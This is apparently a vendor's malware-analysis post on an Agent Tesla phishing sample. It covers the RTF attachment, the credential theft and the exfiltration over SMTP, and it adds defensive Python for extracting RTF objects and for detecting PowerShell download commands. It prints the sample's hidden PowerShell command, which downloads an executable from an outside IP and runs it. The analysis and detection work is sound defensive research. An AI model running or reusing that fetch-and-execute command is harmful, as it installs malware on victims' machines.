Agent Tesla: The RAT Spyware and Infostealer
Agent Tesla is a Malware-as-a-Service Trojan that steals user information and exfiltrates it to the threat actors
Agent Tesla infects systems generally through a phishing email with an attachment. Users are tricked into opening the attachment, thereby installing the malware. Once installed, Agent Tesla captures sensitive data from the infected system and sends it to a predetermined external location.
About the Threat:
Agent Tesla was first observed in late 2014. It is a known malware-as-a-service spyware focused on stealing sensitive information from a victim’s device.
Agent Tesla uses email as the vector for initial infection. The email uses social engineering tactics to appear legitimate. Some samples appear to contain business enquiries while others contain shipment tracking information that is convincing enough to lure the unsuspecting victim into opening the attachment. On opening, the attachment downloads the malware installer, which then establishes external communication and downloads the actual payload. This whole process uses obfuscation to escape detection. Once the installation is complete, two-way communication with the command-and-control server (CNC) is established and information from the infected system is exfiltrated.
Some of the credentials it steals and exfiltrates are –
Credentials from System Registry
Saved credentials from a range of email, messaging applications and commonly used browsers
Credentials stored by VPN clients, download managers and FTP clients
Keyboard inputs (through a key-logger)
The trojan is generally delivered through successful exploitation of CVE-2017-8570. Another characteristic is the use of SMTP for data exfiltration.
Given that Agent Tesla gives the threat actors full access to the affected system, it has far-reaching repercussions for the victims. Typical outcomes include stolen identities, restricted access to system resources, and further attacks launched using the victim’s credentials.
SecneurX’s Analysis of the Modus Operandi
SecneurX's acquisition engine gathered artifacts and examined them using the SecneurX Advanced Malware Analysis Platform. This platform provides unrivalled visibility and context for advanced threats with its extensive malware analysis and detection capabilities, in addition to generating a detailed report describing the malware behavior. Extracted Indicators of Compromise (IOCs) and human-readable behavior reports can be used to augment existing intelligence data and help to give ‘context’ to IPs, domains, URLs, registry keys, process activity, file names and hashes. One such analysis of an artifact is described by our analysts here.
The artifact analysed is SHA256=2ba5487668103c62614cfb4288d1c26a8d5172352b3b34363618c8c91c810818, a document named ‘Fund Released Detail.doc’. This was a Rich Text Format (RTF) file obtained from an email attachment.
The trojan’s behaviour is explained in the following steps.
Once the file attachment is opened, it runs a script to download the installer. This can be seen in the RTF dump. Here, objects 3 and 5 in the image are identical.
Fig 1. Contents of the RTF dump, highlighting the dumped files
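The "objects 3 and 5 are the same" observation above is the kind of finding a triage script can reproduce without opening the document in Word: extract every \objdata hex blob from the RTF, decode it, and hash the result so identical embedded objects show up immediately. The following Python is an added example written for this page, not SecneurX tooling; the RTF text it scans is a constructed stand-in with harmless ASCII payloads, not the analysed 'Fund Released Detail.doc'.

```python
import hashlib
import re

# Constructed RTF sample (not the analysed document): three embedded objects
# whose \objdata payloads are plain ASCII for illustration. Objects 1 and 3
# carry identical bytes; object 2 differs.
SAMPLE_RTF = (
    r"{\rtf1\ansi"
    r"{\object\objemb{\*\objclass Package}{\*\objdata 4f626a656374204120706179 6c6f6164}}"
    r"{\object\objemb{\*\objclass Package}{\*\objdata 6f74686572206f626a656374}}"
    r"{\object\objemb{\*\objclass Package}{\*\objdata 4f626a656374204120706179 6c6f6164}}"
    r"}"
)

# Matches the hex data that follows a \objdata control word up to the closing
# brace. Real samples often interleave junk between hex digits to defeat naive
# scanners; this example tolerates whitespace only (see usage note).
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9A-Fa-f\s]+)")


def extract_objects(rtf_text: str) -> list:
    """Return one record per \\objdata blob: index, size, SHA-256 and a preview."""
    records = []
    for idx, match in enumerate(OBJDATA_RE.finditer(rtf_text), start=1):
        hex_blob = re.sub(r"\s+", "", match.group(1))
        if len(hex_blob) % 2:
            # An odd nibble count cannot decode; drop the trailing nibble rather
            # than abort, so the rest of the document is still triaged.
            hex_blob = hex_blob[:-1]
        data = bytes.fromhex(hex_blob)
        records.append({
            "index": idx,
            "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest(),
            "preview": data[:16],
        })
    return records


def find_duplicates(records: list) -> dict:
    """Map each SHA-256 that occurs more than once to the object indices sharing it."""
    by_hash = {}
    for rec in records:
        by_hash.setdefault(rec["sha256"], []).append(rec["index"])
    return {h: idxs for h, idxs in by_hash.items() if len(idxs) > 1}


if __name__ == "__main__":
    objects = extract_objects(SAMPLE_RTF)
    for rec in objects:
        print(f"object {rec['index']}: {rec['size']} bytes sha256={rec['sha256'][:16]}... "
              f"preview={rec['preview']!r}")
    for digest, idxs in find_duplicates(objects).items():
        print(f"objects {idxs} share payload {digest[:16]}...")
```

Running it prints one line per object and then reports that objects 1 and 3 share the same payload, which is exactly the duplicate-object check worth automating in a document-triage pipeline. For production use, heavily obfuscated RTFs (non-hex filler, nested groups, split control words) should be handled by a dedicated parser such as oletools' rtfobj rather than this whitespace-only regex.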
The obfuscated script is executed and runs the following command -
powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('http[:]//173[.]232[.]204[.]89/ikik[.]exe','%APPDATA%\ikik.exe');Start-Process '%APPDATA%\mb.exe'"
Fig 2. Obfuscated script in the dumped files
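The command above combines several flags that hide PowerShell from the user (-NoP, -NonI, -W Hidden, -ExecutionPolicy bypass), a WebClient download, a drop into %APPDATA% and an immediate Start-Process of the dropped file. That combination is a reliable detection signal in process-creation telemetry (Sysmon Event ID 1, EDR command-line logs). The Python below is an added example for this page, not a SecneurX detection rule; it scores command lines for those traits and extracts the URL and drop paths as IOCs. The sample events are constructed: the first is the command from Fig 2 (defanged as printed above, refanged by the script), the others are benign or borderline administrative commands, with intranet.example and 203.0.113.0/24-style values chosen as placeholders.

```python
import re

# Each check is a prefix-tolerant pattern, because PowerShell accepts abbreviated
# parameters (-NoP for -NoProfile, -NonI for -NonInteractive, -W for -WindowStyle).
FLAG_CHECKS = [
    (re.compile(r"-nop(?:rofile)?\b", re.I), "profile suppressed"),
    (re.compile(r"-noni(?:nteractive)?\b", re.I), "non-interactive"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass\b", re.I), "execution policy bypass"),
]
CRADLE_RE = re.compile(r"\b(?:DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# Drops into user-writable locations that need no elevation.
DROP_RE = re.compile(r"(?:%APPDATA%|%TEMP%|\$env:APPDATA|\$env:TEMP)\\[\w.\\-]+", re.I)
START_RE = re.compile(r"\bStart-Process\b", re.I)

# Constructed process-creation command lines. Event 0 is the Fig 2 command as
# printed in the report (defanged); events 1-3 are made-up admin commands.
SAMPLE_EVENTS = [
    r'''powershell.exe -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('http[:]//173[.]232[.]204[.]89/ikik[.]exe','%APPDATA%\ikik.exe');Start-Process '%APPDATA%\mb.exe'"''',
    r'''powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq 'Running'"''',
    r'''powershell.exe -ExecutionPolicy Bypass -File C:\scripts\deploy.ps1''',
    r'''powershell.exe -W Hidden -Command "Invoke-WebRequest http://intranet.example/update.msi -OutFile $env:TEMP\update.msi"''',
]


def refang(text: str) -> str:
    """Undo the usual report defanging so IOC extraction sees real URLs."""
    return text.replace("[:]", ":").replace("[.]", ".").replace("hxxp", "http")


def analyze(cmdline: str) -> dict:
    """Score one command line and pull out URLs and drop paths as IOCs."""
    text = refang(cmdline)
    indicators, score = [], 0
    for pattern, label in FLAG_CHECKS:
        if pattern.search(text):
            indicators.append(label)
            score += 1
    if CRADLE_RE.search(text):
        indicators.append("download cradle")
        score += 2
    urls = URL_RE.findall(text)
    drops = DROP_RE.findall(text)
    if urls:
        score += 1
    if drops:
        indicators.append("writes to user-writable path")
        score += 1
    if drops and START_RE.search(text):
        indicators.append("executes dropped file")
        score += 1
    # Threshold chosen so that a single evasion flag or a plain download does not alert.
    verdict = "suspicious" if score >= 4 else "benign"
    return {"score": score, "verdict": verdict, "indicators": indicators,
            "urls": urls, "drop_paths": drops}


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        result = analyze(event)
        print(f"[{result['verdict']:>10}] score={result['score']} "
              f"indicators={result['indicators']} urls={result['urls']} drops={result['drop_paths']}")
```

The Fig 2 command scores 9 and yields the download URL and both %APPDATA% paths as IOCs; the two plain administrative commands score 1 each. The fourth event, a hidden-window Invoke-WebRequest that saves to %TEMP%, also crosses the threshold (score 5), which is intentional: that shape is indistinguishable from a stager without further context, so it belongs in an analyst's triage queue rather than being whitelisted by the detector.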
Communication with the CNC is established and the actual payload is downloaded from the CNC.
Fig 3. Downloaded mb.exe from the CNC
This payload completes the download of the malware and executes it.
Once the execution is completed, it grants full control of the affected system to the CNC. User credentials and other information are accessed and the data is exfiltrated to the CNC. The use of SMTP to exfiltrate the data is to be noted here.
Fig 4. User credentials captured for exfiltration
Fig 5. User credentials captured for exfiltration
The full behavior report for the sample can be found at the following URL.
Fig 6. The malware exhibiting living-off-the-land and persistence mechanisms
Next stage Payload Sha256: